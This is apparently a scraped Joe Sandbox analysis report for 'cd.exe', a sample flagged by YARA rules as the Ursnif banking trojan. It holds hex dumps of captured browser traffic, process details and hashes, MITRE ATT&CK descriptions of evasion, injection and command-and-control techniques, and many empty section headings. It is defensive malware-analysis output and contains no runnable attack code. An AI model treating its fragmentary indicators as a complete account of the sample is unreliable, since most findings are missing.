c3 03 c7 83 38 0a 6a 74 98 78 ad ac 2c 3b a0 bb 0a ec d8 c0 9d f8 eb 26 Data Ascii: WJ5Pw_7fT@JYa7Y8Xi1cbvIE0@9p7V\|H,g}j ZP'AS8!RX}aSmx/C B2vLdz8:Xzw01vh$C^](xmYYGhb$cf8jtx,;&
2021-09-14 14:03:24 UTC	178	IN	Data Raw: 39 2c 0c ef b9 3e 96 62 e6 da d6 ba 1a eb 95 c9 78 f0 48 46 f1 20 03 c1 8a ae c9 68 e0 68 3b 5b 6e b3 e9 1c d7 5b 41 34 61 d9 62 7d 04 07 73 ed b8 80 5b 6d fc 7b 9a 6b 8e 64 71 30 90 81 60 45 57 94 95 3f 1a 8f d5 62 cb f3 b6 9a ce b5 c8 7a 20 da 70 0e 9e 69 67 82 39 ab 27 0f a6 66 08 73 4b 30 73 73 0a ca 2a bc 5a fc df f6 03 10 60 d0 7f be 4d 63 46 06 63 dd d5 5c 26 19 ec 76 5d 96 7f e7 8e 1b d6 1f b1 ab c3 6f 6f 15 9e 79 30 06 17 ea 9f 96 e5 43 ec 9b 08 52 4e 1d f1 50 cc 2a 53 6e 17 56 28 e4 94 28 07 84 54 64 74 a0 9f 5c 91 11 2c a5 ce e4 52 cc a4 dc 6b ec 2e a6 40 a2 59 2a 16 a8 03 31 01 b3 20 31 ab 4c b9 8d 81 c8 22 2c 41 dc 8d 0b fb f9 cb 9f a8 0e f4 93 2b 32 82 a5 d4 99 5c 8a 60 e9 5e 3c d7 b4 ad cf 95 ef 4d 4b 55 1d 88 09 bc 09 63 ab 7e bb 6f ac f0 Data Ascii: 9,>bxHF hh;[n[A4ab}s[m{kdq0`EW?bz pig9'fsK0ssZ`McFc\&v]ooy0CRNPSnV((Tdt\,Rk.@Y*1 1L",A+2\`^<MKUc~o
2021-09-14 14:03:24 UTC	179	IN	Data Raw: 1b f0 44 05 04 1f 0b 71 32 4f e5 5d 11 48 a5 61 ff 98 64 2c f0 9e 1b ef 04 ac be 2e 6e c6 fe 31 f0 9e fb 82 8f aa b7 ad be 2e 6e 56 9f 58 b2 03 f2 bc 1e 71 76 c5 e5 cc fd f1 a9 0b d6 03 b1 f8 01 48 e9 58 1b 09 33 90 ff 76 e3 16 5b 76 0b 07 d1 c0 83 6b c4 a6 64 47 e2 04 b8 81 ad ae 3d b6 d4 f2 11 ef 80 c2 0d c9 b5 41 2a 19 73 43 52 b1 e0 39 2c 5c e6 8a ed b5 d1 da 33 75 73 3d ca 9f 1b b2 bc a5 fa 1c 37 14 2e e3 f6 5a 2c 1f 9d 69 e5 7a 78 45 5d 63 f6 20 b6 c3 77 dc 72 70 63 f6 0c 2e 91 83 ac 46 2f 00 49 a4 97 83 94 c0 b5 01 88 25 19 0f 8c c3 0d cc b3 2e 08 3c 3e 41 95 d7 63 ac 2e bc 5a 70 70 1f b6 8e c6 ac c8 a9 58 87 9c 89 3e 0b 2b dc 59 cb 23 9b c6 89 7b 4b 24 b1 68 ec 9a 27 b5 8f d3 7b ab b2 c7 3f 76 60 92 e9 87 2c b9 6c b5 97 f6 22 b6 d6 c7 05 fe 3c cc Data Ascii: Dq2O]Had,.n1.nVXqvHX3v[vkdG=A*sCR9,\3us=7.Z,izxE]c wrpc.F/I%.<>Ac.ZppX>+Y#{K$h'{?v`,l"<
2021-09-14 14:03:24 UTC	181	IN	Data Raw: 00 20 93 46 e5 e0 96 e1 60 89 b1 63 fe 52 88 59 b8 d3 02 d5 13 b4 bf 21 5e 02 e2 76 0c 54 bd 80 20 00 40 c5 1a f9 4f d3 85 d7 47 24 da bf f3 1f 4b e0 86 cb 1a 87 40 75 b3 cc b8 59 13 63 47 c4 4a 40 d6 d7 43 e7 0e 54 bd 80 20 00 40 45 64 bf 8a ec a1 92 eb 95 81 d7 43 d8 7b bb 7d 8f 94 ac a5 88 95 7c c8 1e ad 40 a1 7e 08 42 44 00 b0 e1 79 63 27 95 a2 d2 4c fb 67 06 31 13 63 af 40 75 a3 ac 18 32 a7 74 ad 44 4c 40 ce 6a 2d d6 20 01 01 00 f4 17 95 16 ce 94 45 a5 2d 2b b7 d4 1a bb 44 a0 ba 8f bf 33 68 c6 92 6a bb 4e a0 50 3f 04 01 00 06 a9 ef 64 bf 61 59 54 1a 8d f6 ef ad 9f ff 3c 43 a0 ba 45 9f 76 bb c4 fb 1f 85 fd 32 cf 9b 13 04 0a f5 43 10 00 60 90 d6 3b 63 ec 94 89 f1 3f c8 a1 1a 53 a2 dd 73 b2 6a 3f 50 9d 96 19 b7 4c 59 cb 12 4d e1 cf 0e 14 ea 89 20 c4 00 Data Ascii: F`cRY!^vT @OG$K@uYcGJ@CT @EdC{}\|@~BDyc'Lg1c@u2tDL@j- E-+D3hjNP?daYT<CEv2C`;c?Ssj?PLYM

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.6	49755	142.250.102.106	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-14 14:03:24 UTC	182	OUT	GET /gen_204?ei=rKtAYY2rHY25kwWZrp3YAw&vet=10ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQhJAHCBQ..s&gl=GB&pc=SEARCH_HOMEPAGE&isMobile=false HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.google.com/?gws_rd=ssl Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: www.google.com Connection: Keep-Alive Cookie: CONSENT=PENDING+509
2021-09-14 14:03:24 UTC	182	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Tue, 14 Sep 2021 14:03:24 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.6	49757	142.250.102.106	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-14 14:03:24 UTC	183	OUT	GET /images/searchbox/desktop_searchbox_sprites318_hr.png HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.google.com/?gws_rd=ssl Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: www.google.com Connection: Keep-Alive Cookie: CONSENT=PENDING+509
2021-09-14 14:03:24 UTC	183	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: image/png Cross-Origin-Resource-Policy: cross-origin Content-Length: 779 Date: Tue, 14 Sep 2021 14:03:24 GMT Expires: Tue, 14 Sep 2021 14:03:24 GMT Cache-Control: private, max-age=31536000 Last-Modified: Wed, 22 Apr 2020 22:00:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-09-14 14:03:24 UTC	183	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 7c 08 03 00 00 00 2c 3f 02 be 00 00 00 7b 50 4c 54 45 00 00 00 9f 9f 9f 9b a1 a7 9b a0 a6 9a a0 a5 9a a0 a6 9b a0 a6 9a a0 a6 9a 9f a5 9b a0 a6 9a a0 a6 95 9f a5 99 a0 a6 97 9f 9f 99 9f a4 97 9f a5 9a 9f a6 9a a0 a6 97 9f a7 9b a0 a8 9a a0 a7 99 9f a5 97 9f a3 9a a0 a6 9c a5 ad 98 9f a7 99 9f a6 99 9f a6 99 9f a6 9a a0 a5 9a 9f a5 9c a1 a6 9a a0 a6 9b 9f a3 99 9f a3 9a 9f a5 98 9f a5 9a a1 a8 97 9f a7 9c 9f a6 9a a0 a7 19 ac ba 35 00 00 00 29 74 52 4e 53 00 10 7f bf ef ff cf af 60 8f df 30 af 20 70 60 90 cf 20 8f 9f 80 40 bf 1f b0 70 a0 50 9f 90 5f ef 40 50 30 90 6f 40 50 bf 7c 3a 38 a2 00 00 02 16 49 44 41 54 78 01 ed d6 87 92 da 30 10 80 61 0b fb a7 2c 27 cb f8 84 2e 39 6a 7a de ff 05 Data Ascii: PNGIHDR(\|,?{PLTE5)tRNS`0 p` @pP_@P0o@P\|:8IDATx0a,'.9jz
2021-09-14 14:03:24 UTC	184	IN	Data Raw: 59 0d 6e 5d b9 41 7e 2a ba 6a 90 50 74 2a 4b 4e 65 d1 a9 2c 3a 95 27 d3 b5 ea 4a b9 4d d1 a9 fc ac ee ef eb de 57 74 dc 23 29 5b c1 b9 77 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: Yn]A~jPtKNe,:'JMWt#)[wIENDB`

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: cd.exe PID: 6888 Parent PID: 2272

General

Start time:	16:02:47
Start date:	14/09/2021
Path:	C:\Users\user\Desktop\cd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\cd.exe'
Imagebase:	0x400000
File size:	3922432 bytes
MD5 hash:	CD02E745A08DD29CB6FDA1761B2F4B6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408113887.0000000003138000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.407620205.0000000003138000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408655668.0000000003138000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408034062.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: iexplore.exe PID: 4568 Parent PID: 792

General

Start time:	16:03:15
Start date:	14/09/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff721e20000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 160 Parent PID: 4568

General

Start time:	16:03:17
Start date:	14/09/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4568 CREDAT:17410 /prefetch:2
Imagebase:	0xb20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report cd.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers